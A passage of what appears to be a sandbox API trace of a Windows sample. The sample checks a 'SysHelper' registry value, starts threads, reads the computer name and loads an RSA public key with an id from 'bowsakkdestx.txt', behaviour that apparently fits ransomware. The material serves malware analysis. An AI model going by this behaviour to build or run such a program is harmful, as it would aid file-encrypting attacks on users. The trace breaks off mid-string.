RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x3244838 [0226.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x32450c0 [0226.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x324f250 [0226.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x324fab8 [0226.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x3245948 [0226.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x32461d0 [0226.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x3246a58 [0226.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x32472e0 [0226.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x3247b68 [0226.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x32483f0 [0226.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x3248c78 [0226.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x3249500 [0226.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x3249d88 [0226.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7748 [0226.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x324a610 [0226.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x3250320 [0226.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x3250b38 [0226.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x324ae98 [0226.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x324b720 [0226.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x324bfa8 [0226.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x324c830 [0226.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a0060 [0226.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x7117c8 [0226.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a08e8 [0226.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a1170 [0226.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a19f8 [0226.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2280 [0226.270] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41f130, lpParameter=0x31fc7c8, dwCreationFlags=0x0, lpThreadId=0x31cadd0 | out: lpThreadId=0x31cadd0*=0x314) returned 0x5d0 [0226.271] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41fd80, lpParameter=0x529238, dwCreationFlags=0x0, lpThreadId=0x529230 | out: lpThreadId=0x529230*=0x318) returned 0x5d4 [0226.272] GetMessageW (lpMsg=0x18d438, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) [0238.180] NtdllDefWindowProc_W () returned 0x0 [0240.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x37b5b70 [0240.457] GetComputerNameW (in: lpBuffer=0x37b5b70, nSize=0x18c7b4 | out: lpBuffer="XDUWTFONO", nSize=0x18c7b4) returned 1 [0240.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed710 [0240.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0240.457] IsWindow (hWnd=0x2014e) returned 1 [0240.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed710 | out: hHeap=0x630000) returned 1 Thread: id = 178 os_tid = 0x534 Thread: id = 179 os_tid = 0x56c Thread: id = 180 os_tid = 0x570 Thread: id = 181 os_tid = 0x558 Thread: id = 182 os_tid = 0x554 Thread: id = 183 os_tid = 0x170 Thread: id = 200 os_tid = 0x564 Thread: id = 201 os_tid = 0x344 Thread: id = 202 os_tid = 0x5bc [0225.591] timeGetTime () returned 0x113893c [0225.591] GetLastError () returned 0x54f [0225.591] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3bc) returned 0x31c3280 [0225.599] GetCurrentThreadId () returned 0x5bc [0225.599] SetLastError (dwErrCode=0x54f) [0225.599] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", ulOptions=0x0, samDesired=0xf003f, phkResult=0x989a5e4 | out: phkResult=0x989a5e4*=0x5ac) returned 0x0 [0225.599] RegQueryValueExW (in: hKey=0x5ac, lpValueName="SysHelper", lpReserved=0x0, lpType=0x989a5d8, lpData=0x989a5e0, lpcbData=0x989a5dc*=0x4 | out: lpType=0x989a5d8*=0x4, lpData=0x989a5e0*=0x1, lpcbData=0x989a5dc*=0x4) returned 0x0 [0225.599] RegCloseKey (hKey=0x5ac) returned 0x0 [0225.641] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x989a4e4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0225.641] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0225.641] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x6534d8 [0225.650] AreFileApisANSI () returned 1 [0225.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x989a4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0225.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7a) returned 0x694310 [0225.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x989a4e4, cbMultiByte=-1, lpWideCharStr=0x694310, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0225.678] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x989a368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5ac [0225.721] GetFileType (hFile=0x5ac) returned 0x1 [0225.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694310 | out: hHeap=0x630000) returned 1 [0225.728] SetFilePointerEx (in: hFile=0x5ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x989a418 | out: lpNewFilePointer=0x0) returned 1 [0225.728] SetFilePointerEx (in: hFile=0x5ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x989a410 | out: lpNewFilePointer=0x0) returned 1 [0225.728] SetFilePointerEx (in: hFile=0x5ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x98993f4 | out: lpNewFilePointer=0x0) returned 1 [0225.728] SetFilePointerEx (in: hFile=0x5ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x98993ec | out: lpNewFilePointer=0x0) returned 1 [0225.729] SetFilePointerEx (in: hFile=0x5ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x989a434 | out: lpNewFilePointer=0x0) returned 1 [0225.729] SetFilePointerEx (in: hFile=0x5ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x989a42c | out: lpNewFilePointer=0x0) returned 1 [0225.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1000) returned 0x31c3648 [0225.729] ReadFile (in: hFile=0x5ac, lpBuffer=0x31c3648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x989a3c4, lpOverlapped=0x0 | out: lpBuffer=0x31c3648*, lpNumberOfBytesRead=0x989a3c4*=0x232, lpOverlapped=0x0) returned 1 [0225.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c3648 | out: hHeap=0x630000) returned 1 [0225.751] CloseHandle (hObject=0x5ac) returned 1 [0225.751] lstrlenA (lpString="{\"public_key\":\"") returned 15 [0225.751] lstrcpyA (in: lpString1=0x989ab78, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" [0225.751] lstrcpyA (in: lpString1=0x989a778, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" [0225.751] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.751] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.751] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.751] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.751] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.751] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.751] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.751] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.751] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.751] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.751] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.752] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.752] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.752] lstrlenA (lpString="-----BEGIN PUBLIC 